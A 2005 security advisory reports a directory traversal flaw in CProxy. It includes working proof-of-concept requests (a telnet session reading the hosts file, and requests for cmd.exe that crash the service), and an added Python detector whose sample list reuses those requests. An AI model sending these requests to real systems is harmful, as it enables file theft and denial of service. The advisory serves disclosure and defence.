[NT] Directory Traversal In CProxy

From: SecuriTeam (support_at_securiteam.com)
Date: 03/07/05

    To: list@securiteam.com
    Date: 7 Mar 2005 10:35:33 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Directory Traversal In CProxy
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.computalynx.com/> CProxy is a Windows-based (95/98, NT4
    and 2000) software solution that provides a single point of contact
    between your network and the Internet.

    Because of inadequate input validation, a malicious attacker can perform a
    directory traversal attack and thus gain access to arbitrary files located
    on the CProxy Server system. Using the same attack vector with specially
    crafted HTTP requests, it is possible to crash the CProxy service running
    on the remote system.

    DETAILS

    Vulnerable Systems:
     * Computalynx CProxy 3.3 family for Win32.
     * Computalynx CProxy 3.4.x (3.4.4 inclusive) for Win32.

    When performing proxy functions, CProxy Server is vulnerable to a
    directory traversal attack. Inadequate input validation and input
    filtering allow a remote attacker to gain access to arbitrary files on
    the Windows system upon which the CProxy Server software has been
    deployed. The cause is that CProxy Server fails to filter out directory
    traversal sequences in the requested URL and therefore does not prevent
    arbitrary files from being requested and opened through the proxy
    service. A specially crafted URL allows arbitrary files to be retrieved
    from the system. The retrieval of system files can compromise the entire
    system or expose it to further avenues of attack. A malicious attacker
    can issue a request in the following format to gain access to arbitrary
    data.

    Proof of concept:
    GET http://>/<filename> HTTP/1.0<CRLF><CRLF>

    An attacker can gain access to a file in the WINNT directory as shown in
    the following example, by connecting to CProxy Server's proxy service
    (listening on TCP port 8080 by default) and performing a request.

    Proof of concept:
    [user@host ~]$ telnet 10.0.0.1 8080
       Trying 10.0.0.1...
       Connected to 10.0.0.1.
       Escape character is '^]'.
       GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0

       HTTP/1.0 200 OK
       Content-length: 734
       Date: Sat, 19 Feb 2005 21:09:58 GMT
       Date: Sat, 19 Feb 2005 21:09:58 GMT
       # Copyright (c) 1993-1999 Microsoft Corp.
       #
       # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
       #
       # This file contains the mappings of IP addresses to host names. Each
       # entry should be kept on an individual line. The IP address should
       # be placed in the first column followed by the corresponding host name.
       # The IP address and the host name should be separated by at least one
       # space.
       #
       # Additionally, comments (such as these) may be inserted on individual
       # lines or following the machine name denoted by a '#' symbol.
       #
       # For example:
       #
       # 102.54.94.97 rhino.acme.com # source server
       # 38.25.63.10 x.acme.com # x client host

       127.0.0.1 localhost
       Connection closed by foreign host.

    Retrieving an arbitrary ASCII file with the "GET" method causes the file
    to be displayed and, immediately afterwards, causes the CProxy Server
    service to crash with an error message indicating that "memory could not
    be read". Retrieving the same ASCII file with the "POST" or "HEAD" method
    displays the file contents without crashing the CProxy Server service,
    which allows an attacker to execute multiple requests and thus retrieve
    various arbitrary files from the CProxy Server system.

    Proof of concept:
    "POST http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0"
    "GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0"

    Attempting to retrieve an executable file with any of these HTTP methods
    ("GET", "HEAD" or "POST") in the aforementioned manner causes the
    contents of the executable file to be displayed and the CProxy Server
    service to crash with the error message "memory could not be read",
    rendering the service unavailable and thus resulting in a
    Denial-of-Service condition.

    Proof of concept:
    "GET http://../../../../../winnt/system32/cmd.exe"
    "POST http://../../../../../winnt/system32/cmd.exe"
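    The request pattern described in this advisory can be caught at the proxy
    (or in its access log) before any file is opened. The following is an added
    example written for this page; it is neither CProxy's code nor the
    reporter's. It decodes the request target, treats a dot-segment authority
    such as "http://../" as traversal, converts Windows backslashes, and walks
    the path's depth so that a request like "a/../b.html", which stays inside
    the site, is not flagged while any path that climbs above the root is. The
    sample request lines are constructed for the example; two of them are the
    advisory's own proof-of-concept requests.

```python
"""Proxy-side directory-traversal detector (added example, not CProxy code)."""
from urllib.parse import urlsplit, unquote

DOT_SEGMENTS = {".", ".."}


def _decode(target: str) -> str:
    """Undo percent-encoding (twice, to catch double-encoded '..') and
    normalise Windows backslashes to '/', since the proxy runs on Windows."""
    for _ in range(2):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target.replace("\\", "/")


def is_traversal_request(request_line: str) -> bool:
    """Return True when an HTTP request line's target would escape the root.

    Two conditions are checked:
      * absolute-URI form whose authority is empty or a dot segment
        (e.g. "http://../..."), the form shown in the advisory;
      * a path whose '..' segments climb above the root at any point
        (so "/a/../b.html" is fine but "/../b.html" is not).
    """
    parts = request_line.split()
    if len(parts) < 2:
        return False  # malformed request line; out of scope here
    url = urlsplit(_decode(parts[1]))
    if url.scheme:  # proxy (absolute-URI) request: authority must be a host
        if not url.netloc or (url.hostname or "") in DOT_SEGMENTS:
            return True
    depth = 0
    for segment in url.path.split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment not in ("", "."):
            depth += 1
    return False


def scan_request_lines(lines):
    """Return (line_no, method, decoded target) for every flagged line."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        if is_traversal_request(line):
            method, target = line.split()[:2]
            hits.append((line_no, method, _decode(target)))
    return hits


# Constructed sample input: lines 2 and 3 are the advisory's proof-of-concept
# requests; the others are made up to exercise encoding and benign cases.
SAMPLE_REQUEST_LINES = [
    "GET http://www.example.com/index.html HTTP/1.0",
    "GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0",
    "POST http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0",
    "HEAD http://www.example.com/%2e%2e/%2e%2e/winnt/system32/cmd.exe HTTP/1.0",
    r"GET http://www.example.com/docs\..\..\winnt\win.ini HTTP/1.0",
    "GET http://www.example.com/a/../b.html HTTP/1.0",
    "GET /index.html HTTP/1.0",
]

if __name__ == "__main__":
    for line_no, method, target in scan_request_lines(SAMPLE_REQUEST_LINES):
        print(f"line {line_no}: {method} {target}  <- traversal")
```

    Note that the detector flags all three methods alike; the advisory's
    observation that only "GET" crashes the service is a symptom, not a
    reason to treat "POST" or "HEAD" requests to the same target as safe.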

    Disclosure Timeline:
    19/02/2005 - Computalynx contacted regarding this issue.
    02/03/2005 - At present, the vendor has not replied regarding this issue.

    ADDITIONAL INFORMATION

    The information has been provided by
    <mailto:kristof.philipsen@ubizen.com> Kristof Philipsen.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

